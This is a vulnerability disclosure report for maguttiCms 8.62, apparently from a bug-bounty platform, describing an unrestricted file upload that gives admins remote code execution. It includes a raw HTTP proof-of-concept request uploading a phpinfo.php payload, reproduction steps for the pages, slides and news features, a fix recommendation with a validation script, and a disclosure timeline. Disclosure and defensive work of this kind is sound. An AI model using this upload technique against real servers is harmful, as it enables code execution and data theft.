Unrestricted Upload of File with Dangerous Type in marcoax/magutticms

Valid

Reported on

Oct 25th 2021


Description

The 'upload file image or document' function of maguttiCms 8.62 does not restrict the type of uploaded files, so a remote authenticated administrator can upload a PHP file into a web-served media directory and execute arbitrary PHP code on the server (RCE).

Proof of Concept

// PoC.req
POST /admin/api/uploadifiveSingle HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------289373597033088154093484704035
Content-Length: 1123
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/edit/articles/2
Cookie: CRM-a065912273e9ce1828ca92e192338d12=hl8kmfm92bf9ducncp1qro5ibo; PHPSESSID=rooedmi2ipb8qpu8mie54h0g6r; install_f528764d624d=d7sr8hakotuhjg37mg4spnjghv; _hjid=2f0f1c3b-7bed-4258-933b-ff637ebfdec0; __hstc=19301799.95f1db85f7fcdf6d34a1f1b99da598b0.1634716071331.1634716071331.1634716071331.1; hubspotutk=95f1db85f7fcdf6d34a1f1b99da598b0; __hssrc=1; ajs_anonymous_id=7365ff25-af33-4fe1-9758-7e557b70493a; __utma=96992031.1997153298.1634716441.1634716441.1634716441.1; __utmc=96992031; __utmz=96992031.1634716441.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionid=356kck05s8r7pcu3pgonp32stq; XSRF-TOKEN=eyJpdiI6IjZuRlhoUWowM3lsNFBxSkN4MlduZ1E9PSIsInZhbHVlIjoia1VXUmZ3cmlyQ1NsRjlDK243VDhTZlphRkV0bW55K001Uk5QLytNY2p6TFdmZmw5a091K2s0OVE1aTk3VFRWUVM0Z2hWNFpURnRWU20wb1VKSUNkaGFQWmRyRTQyeDJFMGFVYXdZdlRialBuUW44MVJ2aWJXbGlFeVJOSWh4V0ciLCJtYWMiOiJjNTlmYmNmNjlkMGYxY2NjMzIxNjg1MGYxNjZiODEyOTQyMzZhZGVjNTdkOWI0OWRkMTRmMjZjZjcwMzUwYjI5IiwidGFnIjoiIn0%3D; magutticms_session=eyJpdiI6Im4wS0huUmJaZWVtb0Rxd2tPOEZPdnc9PSIsInZhbHVlIjoieE95SmNUL1dEcGk1SUMzeXpDVWcrS2tpN2tQN3NXL1ZhbzlnaEloNzlOUThIelJuSzVsekY5V2ZXWE9YS0lMZU5SdGdRcDhma2owWlNkRWpZdjZuVkZMd1E5NTFINUpUU1ZxWTNxUlZwQUwxajB6R2E4NkZaL1c3WWU0ZVc0R0EiLCJtYWMiOiIzNWQyNDg5ZDEyYmEzZGM3NDBlMTYwZDEzOGU0MzBlZTVhZmQzZDc3Njc0ZmI0MmQxM2U5Y2VmOWMzZjJiNDY3IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Filedata"; filename="phpinfo.php"
Content-Type: text/php

<?php echo phpinfo(); ?>
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="timestamp"

1451682058
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="token"

4b9fe8f26d865150e4b26b2a839d4f2b
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="Id"

2
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="myImgType"


-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="model"

Article
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="key"

doc
-----------------------------289373597033088154093484704035
Content-Disposition: form-data; name="_token"

ZvErjYb1Qmxp84MY7btjvjnYjryEFe8SuyEReMgo
-----------------------------289373597033088154093484704035--

Steps to Reproduce

Log in to the admin panel.

Pages

Go to Pages and choose Create page.

At the Image or Document selection, upload a file such as phpinfo.php.

OR

Choose Edit on an existing page.

On the Media tab, choose a file such as phpinfo.php.

Access the file at https://domain/media/docs/xxxx-phpinfo.php or https://domain/media/image/xxxx-phpinfo.php.

Slides

Go to Slides and choose Create slide.

At the Image selection, upload a file such as phpinfo.php.

Access the file at https://domain/media/image/xxxx-phpinfo.php.

News

Go to News and choose Create new.

At the Image File Manager selection, upload a file such as phpinfo.php.

OR

At the Document selection, upload a file such as phpinfo.php.

Access the file at https://domain/media/docs/xxxx-phpinfo.php.

How to find the file name

Once the item is saved, the stored file names are returned in the upload response; alternatively, they can be read from the page source in the browser.

Note

Because all of these features share the same image and document file handling functions, I have only listed the places where the vulnerability is reachable; the request above is the same in each case.

Impact

An authenticated administrator, or an attacker who has obtained an administrator's credentials or session, can upload a PHP file and execute arbitrary code with the privileges of the web server process. This gives control of the web server and access to any sensitive content it stores, including application configuration and the data of the site.

Recommendation

Validate uploads before storing them: allow only an explicit list of file extensions, check the detected file type (derived from the file's contents, not from the Content-Type header or the client-supplied name) against the same list, and store the file under a server-generated name, ideally in a location from which the web server does not execute PHP. Laravel provides several approaches to validating incoming data, including the mimes and mimetypes rules for uploaded files.
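As an added example, not code from the maguttiCms project, the following standalone PHP script implements the checks the recommendation calls for and runs them against the PoC's phpinfo.php payload and a genuine image. The function name validateUpload, the allowlists, the size limit and the sample files are assumptions of this example.

```php
<?php
// Added example, not maguttiCms code. Validates an uploaded file by an
// extension allowlist AND the detected content type, then assigns a
// server-chosen name. Assumptions: the allowlists, the size limit and the
// sample inputs are illustrative; the directory the result is written to
// must not be one from which the web server executes PHP.
declare(strict_types=1);

// Extensions a client may present, and the storage extension for each
// content type libmagic may report. Both lists are assumptions.
const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
const MIME_TO_EXTENSION = [
    'image/jpeg'      => 'jpg',
    'image/png'       => 'png',
    'image/gif'       => 'gif',
    'application/pdf' => 'pdf',
];
const MAX_BYTES = 10 * 1024 * 1024;

/**
 * Return the name the upload may be stored under, or throw if it is rejected.
 * $clientName is the untrusted browser-supplied filename; $tmpPath is the file
 * PHP wrote to its temporary directory (what $_FILES['Filedata']['tmp_name']
 * would hold in a real request).
 */
function validateUpload(string $clientName, string $tmpPath): string
{
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new InvalidArgumentException('bad size');
    }

    // 1. Exactly one extension, and it must be allowlisted. This rejects the
    //    PoC's phpinfo.php and double extensions such as shell.php.png.
    $parts = explode('.', basename($clientName));
    if (count($parts) !== 2 || $parts[0] === '') {
        throw new InvalidArgumentException('filename must be name.ext');
    }
    $clientExt = strtolower($parts[1]);
    if (!in_array($clientExt, ALLOWED_EXTENSIONS, true)) {
        throw new InvalidArgumentException("extension .$clientExt not allowed");
    }

    // 2. Detect the type from the bytes, never from the multipart Content-Type
    //    (the PoC sends text/php) or the filename. A file starting with "<?php"
    //    is reported as text/x-php, which is not in the map.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime === false || !isset(MIME_TO_EXTENSION[$mime])) {
        throw new InvalidArgumentException('content type not allowed: ' . var_export($mime, true));
    }

    // 3. Server-generated name: random, with the extension taken from the
    //    detected type. Nothing from the client-supplied name survives.
    return bin2hex(random_bytes(16)) . '.' . MIME_TO_EXTENSION[$mime];
}

// Constructed demo inputs (not from the report): the PoC payload under several
// names, and a valid 1x1 transparent PNG.
const PNG_1X1 = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==';
$phpPayload = '<?php echo phpinfo(); ?>';
$cases = [
    ['phpinfo.php',   $phpPayload],             // rejected at step 1
    ['phpinfo.png',   $phpPayload],             // rejected at step 2
    ['shell.php.png', base64_decode(PNG_1X1)],  // rejected at step 1
    ['photo.png',     base64_decode(PNG_1X1)],  // accepted and renamed
];

foreach ($cases as [$name, $bytes]) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $bytes);
    try {
        printf("%-14s -> stored as %s\n", $name, validateUpload($name, $tmp));
    } catch (InvalidArgumentException $e) {
        printf("%-14s -> rejected: %s\n", $name, $e->getMessage());
    } finally {
        unlink($tmp);
    }
}
```

In Laravel terms the same checks are the mimes (or mimetypes) and max rules on the Filedata field, which inspect the file's contents through finfo rather than trusting the Content-Type part header, followed by $request->file('Filedata')->store(...), which names the file with a random hash and an extension derived from the detected type. Validation alone is only half of the fix: the media directories that /media/docs/ and /media/image/ are served from should also be configured so that the web server never hands files there to the PHP interpreter, so that a bypass of the type check still cannot lead to code execution.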

Timeline

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a month ago)
lethanhphuc modified their report (a month ago)
We have contacted a member of the marcoax/magutticms team and are waiting to hear back (a month ago)
We have sent a follow up to the marcoax/magutticms team. We will try again in 7 days. (a month ago)
We have sent a second follow up to the marcoax/magutticms team. We will try again in 10 days. (a month ago)
marcoax validated this vulnerability (a month ago)
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
marcoax confirmed that a fix has been merged on 39b55d (a month ago)
The fix bounty has been dropped